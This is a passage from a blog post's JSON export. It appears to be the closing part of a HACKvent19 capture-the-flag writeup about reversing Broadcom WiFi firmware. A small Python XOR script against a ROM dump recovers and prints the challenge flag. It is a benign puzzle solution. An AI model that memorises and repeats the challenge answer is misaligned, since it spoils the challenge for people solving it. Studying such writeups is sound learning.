0x0080000<\/code>. Also at the end of the decompiled function, there is a call to <code>0x0000239<\/code>, which is called passing the address of one of the potential flag data (<code>0x00058eac<\/code>) as well as <code>0x800000<\/code> and <code>0x17<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/24_06_func.png\" \/>\n<br\/>\n<br\/>This function uses the second parameter (<code>0x0080000<\/code>) as a reference and exchanges values with the first parameter (the potential flag data):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/24_07_func_rom.png\" width=\"900px\"\/>\n<br\/>\n<br\/>When searching through the <a href=\"https:\/\/github.com\/seemoo-lab\/nexmon\" rel=\"noopener noreferrer\" target=\"_blank\">nexmon github repo<\/a> I stumbled upon this <a href=\"https:\/\/github.com\/seemoo-lab\/nexmon\/blob\/master\/firmwares\/bcm43430a1\/7_45_41_26\/definitions.mk\" rel=\"noopener noreferrer\" target=\"_blank\">definitions.mk<\/a> file. In addition to the file which was provided in the challenge (<code>brcmfmac43430-sdio.bin<\/code>), there is a reference to another file called <code>rom.bin<\/code>, which seems to be loaded at the address <code>0x800000<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\nRAM_FILE=brcmfmac43430-sdio.bin\nRAMSTART=0x0\nRAMSIZE=0x80000\n\nROM_FILE=rom.bin\nROMSTART=0x800000\nROMSIZE=0xA0000\n...<\/pre>I really had a hard time to find this file, but it turned out that the file can simply be found in another repo of <a href=\"https:\/\/github.com\/seemoo-lab\" rel=\"noopener noreferrer\" target=\"_blank\">seemoo-lab<\/a>: <a href=\"https:\/\/github.com\/seemoo-lab\/bcm_misc\/tree\/master\/bcm43430a1\" rel=\"noopener noreferrer\" target=\"_blank\">seemoo-lab \/ bcm_misc \/ bcm43430a1<\/a>.\n<br\/>\n<br\/>Since the data at <code>0x00058eac<\/code> seems to be exchanged by the function at <code>0x2390<\/code>, let's adjust our python script to use the data from the <code>rom.bin<\/code> file instead:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nstack_vals = '\\x09\\xBC\\x31\\x3A\\x68\\x1A\\xAB\\x72\\x47\\x86\\x7E\\xE6\\x4A\\x1D\\x6F\\x04\\x2E\\x74\\x50\\x0D\\x78\\x06\\x3E'\nkey = open('rom.bin').read()\n\nout = ''\nfor i in range(len(stack_vals)):\n  out += chr(ord(stack_vals[i]) ^ ord(key[i]))\n\nprint(out)\n<\/pre>\n<br\/>Running the script now actually outputs the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/24# .\/xorRom.py\nHV19{Y0uw3n7FullM4Cm4n}\n<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{Y0uw3n7FullM4Cm4n}<\/span>.\n<br\/><br\/>\n","protected":false},"excerpt":{"rendered":"<p>This year&#8217;s HACKvent was hosted on the brand new Hacking-Lab 2.0 plattform. Each day from the 1st of december until the 24th a new challenge is published raising in difficulty. The flag format changed from HV18-xxxx-xxxx-xxxx-xxxx-xxxx to HV19{&#8230;}. After all I managed to solve all 28 challenges \ud83d\ude42 Hidden HV19.H1 Hidden OneHV19.H2 Hidden TwoHV19.H3 Hidden &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/devel0pment.de\/?p=1663\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;HACKvent19 writeup&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[25,7],"tags":[47,16,15,38,12,19,14],"class_list":["post-1663","post","type-post","status-publish","format-standard","hentry","category-hacking-lab-com","category-writeup","tag-debugging","tag-hacking-lab","tag-hackvent","tag-python","tag-reversing","tag-x64","tag-x86"],"_links":{"self":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/1663"}],"collection":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1663"}],"version-history":[{"count":71,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/1663\/revisions"}],"predecessor-version":[{"id":1864,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/1663\/revisions\/1864"}],"wp:attachment":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1663"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1663"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1663"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}